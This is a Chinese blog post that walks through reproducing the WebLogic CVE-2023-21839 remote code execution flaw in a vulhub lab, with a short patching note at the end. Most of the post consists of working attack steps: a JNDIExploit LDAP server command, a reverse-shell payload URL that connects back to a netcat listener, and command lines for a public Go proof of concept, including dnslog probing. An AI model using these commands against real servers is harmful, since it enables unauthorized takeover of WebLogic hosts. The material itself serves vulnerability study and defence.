CVE-2023-21839远程代码执行漏洞

最新推荐文章于 2023-12-14 04:30:00 发布
最新推荐文章于 2023-12-14 04:30:00 发布
阅读量1.5k 收藏 3
点赞数
分类专栏: 攻防技术 文章标签: 网络 java linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LDBQH/article/details/130459956
版权

一、环境搭建

使用vulhub快速搭建环境

进入weblogic/CVE-2023-210839目录下,执行命令:

docker-compose up -d

部署完成后直接访问7001端口即可

http://192.168.5.183:7001/console

二、漏洞利用

此漏洞是需要远程加载恶意类来实现攻击,需要JNDIExploit工具在远程开启服务实现恶意类的加载

java -jar JNDIExploit.jar --ip {接收shell的ip}

使用java -jar JNDIExploit-1.4-SNAPSHOT.jar -u命令查看payload,使用如下payload:

ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}

开启nc监听,用来接收回连的shell:

用来发送payload的poc程序:

GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 / CVE-2023-21931 / CVE-2023-21979 一键检测

本PoC是针对CVE-2023-21839编写的,实际上同时覆盖了CVE-2023-21931和CVE-2023-21979。因为这三个漏洞触发机制相同,且补丁方式相同,所以只要存在一个,那么其他两个也存在。

此poc使用go语言编写,使用命令编译成可执行文件:

cd cmd

go build -o CVE-2023-21839.exe

CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

dnslog探测:

CVE-2023-21839.exe -ip {weblogic服务器ip} -port 7001 -ldap ldap://ug9h0m.dnslog.cn

反弹shell,ldap参数需要修改为JNDIExploit生成的payload

CVE-2023-21839.exe -ip {weblogic服务器ip} -port 7001 -ldap ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}

三、修复方案

目前官方已经发布了补丁,此漏洞还是出在T3和IIOP协议上,禁用此协议也可规避漏洞。

十九线菜鸟学安全
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 4109
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE-2023-1389、TP-Link Archer AX-21 命令注入安全漏洞(/cgi-bin/luci/;stok=/locale?form=country&operation=writ)
最新发布
墨痕诉清风的博客
07-17 916
TP-Link Archer AX-21 命令注入安全漏洞1.1.4 Build 20230219 之前的 TP-Link Archer AX21 (AX1800) 固件版本存在漏洞
Weblogic-CVE-2023-21839
Continuejww的博客
12-14 949
RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过远程协议进行远程命令执行,当或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。由此可见:CVE-2023-21839是一个weblogic的JNDI注入漏洞
漏洞复现】Weblogic CVE-2023-21839
zg_111的博客
03-23 6582
Weblogic CVE-2023-21839漏洞复现
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1268
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
CVE-2023-21839:Oracle WebLogic Server RCE
qq_45747465的博客
07-07 576
努力提升自己呀
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响的 NetScaler ADC 和 NetScaler Gateway 客户尽快安装相关的更新版本。 NetScaler ADC 和 ...
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1682
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
【高危】WebLogic Server 远程代码执行漏洞复现及攻击拦截 (CVE-2023-21839)
xsharkrasp的博客
05-18 602
近日,Oracle WebLogic Server被检测到远程代码执行漏洞(CVE-2023-21839),该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致关键数据的未授权访问或直接获取WebLogic服务器权限。当远程对象继承自OpaqueReference时,客户端在对该对象进行JNDI查找并获取的时候,服务器端实际上是通过调用远程对象的getReferent()方法来获取该对象的实际引用。发起攻击请求:新建/tmp/1.txt文件。
Weblogic远程代码执行漏洞 CVE-2023-21839
昀光Icrus的博客
04-10 1089
记录个人在本地环境下复现Weblogic远程命令执行漏洞CVE-2023-21839的过程,每一步都将使用的工具下载地址附在了链接中,用于记录学习
Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
qq_69775412的博客
08-09 824
Weblogic 允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup 操作,当JDK版本过低或本地存在javaSerializedData时,这可能会导致RCE漏洞
CVE-2023-21839 WebLogic Server RCE分析
Jay
04-18 827
在后续的进行lookup操作之前会检查 JNDI 环境是否已正确配置以访问远程资源,主要是对jndiEnvironment和remoteJNDIName的检测,如果在if中的任何一个条件为真,那么将调用对象的lookup方法,如果 if 语句中的所有条件都为假,则会进入检查cachedReferent字段的阶段。weblogic10 及以后的版本,不能直接使用server/lib 目录下的 weblogic.jar 了,需要手动执行一个命令生成手动生成 wlfullclient.jar。
CVE-2023-21839 weblogic rce漏洞复现
wutiangui的博客
11-04 1448
C:\Program Files\Java\jdk1.8.0_181\bin>java -jar G:\资料\vulhub复现\weblogic\可行工具\Weblogic-CVE-2023-21839.jar 192.168.232.131:7001 ldap://192.168.180.2:1389/Basic/ReverseShell/192.168.180.2/2000。执行以上命令可以在dnslog上获得回显,即可验证可能存在该漏洞。复现之前请务必切换路径到jdk路径下。
CVE-2023-21839漏洞复现
qq_34914659的博客
02-28 4096
CVE-2023-21839漏洞复现
CVE-2023-21839 Weblogic IIOP RCE复现
Love&Share
04-14 1667
WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。WebLogic Server是一个基于JAVAEE架构的中间件,将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,提供了Java Enterprise Edition (EE)和Jakarta EE的可靠、成熟和可扩展的实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值